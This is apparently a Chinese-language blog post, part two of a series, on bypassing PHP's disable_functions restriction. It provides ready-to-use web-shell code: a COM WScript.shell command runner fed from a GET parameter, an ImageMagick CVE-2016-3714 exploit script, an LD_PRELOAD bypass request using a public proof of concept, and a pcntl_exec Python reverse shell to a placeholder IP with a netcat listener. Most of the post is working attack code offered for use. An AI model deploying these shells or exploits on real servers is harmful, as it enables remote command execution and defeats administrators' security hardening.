php bypass disable_functions(二)

continue

COM组件

官方说明:

Now, why would or should you use COM? COM is one of the main ways to glue applications and components together on the Windows platform; using COM you can launch Microsoft Word, fill in a document template and save the result as a Word document and send it to a visitor of your web site. You can also use COM to perform administrative tasks for your network and to configure your IIS; these are just the most common uses; you can do much more with COM.
若开启,则可在phpinfo中的`com_dotnet`找到`COM_support = enabled`

利用代码:

1
2
3
4
5
6
7
8
<?php
$command=$_GET['a'];
$wsh = new COM('WScript.shell'); // 生成一个COM对象 Shell.Application也能
$exec = $wsh->exec("cmd /c ".$command); //调用对象方法来执行命令
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>

ImageMagick

官方说明:

Imagick 是用 ImageMagic API 来创建和修改图像的PHP官方扩展。

ImageMagick® 是用来创建,编辑,合并位图图像的一套组件。 它能够用于读取,转换,写入多种不同格式的图像。 包含 DPX, EXR, GIF, JPEG, JPEG-2000, PDF, PhotoCD, PNG, Postscript, SVG, 和 TIFF。

利用版本:ImageMagick 6.9.3-9以前版本(CVE-2016-3714)

安装此扩展:

sudo apt-get install php5.6-imagick

安装后即可在phpinfo中找到imagick相关配置

利用代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php
echo "Disable Functions: " . ini_get('disable_functions') . "\n";

$command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
if ($command == '') {
$command = 'id';
}

$exploit = <<<EOF
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|$command")'
pop graphic-context
EOF;

file_put_contents("KKKK.mvg", $exploit);
$thumb = new Imagick();
$thumb->readImage('KKKK.mvg');
$thumb->writeImage('KKKK.png');
$thumb->clear();
$thumb->destroy();
unlink("KKKK.mvg");
unlink("KKKK.png");
?>

LD_PRELOAD

LD_PRELOAD是Linux下的一个环境变量,它允许你定义在程序运行前优先加载动态链接库

如果system()位于系统共享对象a.so中,想法在a.so前优先加载可控的evil.so,evil.so内含有与system()同名的恶意函数,由于evil.so优先级较高,所以进程会调用到evil.so的system()函数

该方法需要mail()和putenv()函数

根据大佬编好的poc(项目地址),可以直接执行系统命令,例如

http://127.0.0.1/bypass_disablefunc.php?cmd=ls%20/&outpath=/tmp/aa&sopath=/var/www/html/bypass_disablefunc_x64.so

pcntl_exec

该方法需要pcntl_exec函数

首先本地监听:

nc -lvvp 1234

利用代码反弹shell:

<?php  pcntl_exec("/usr/bin/python",array('-c', 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM,socket.SOL_TCP);s.connect(("xx.xx.xx.xx",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'));?>

参考:

https://xz.aliyun.com/t/5320#toc-2

https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD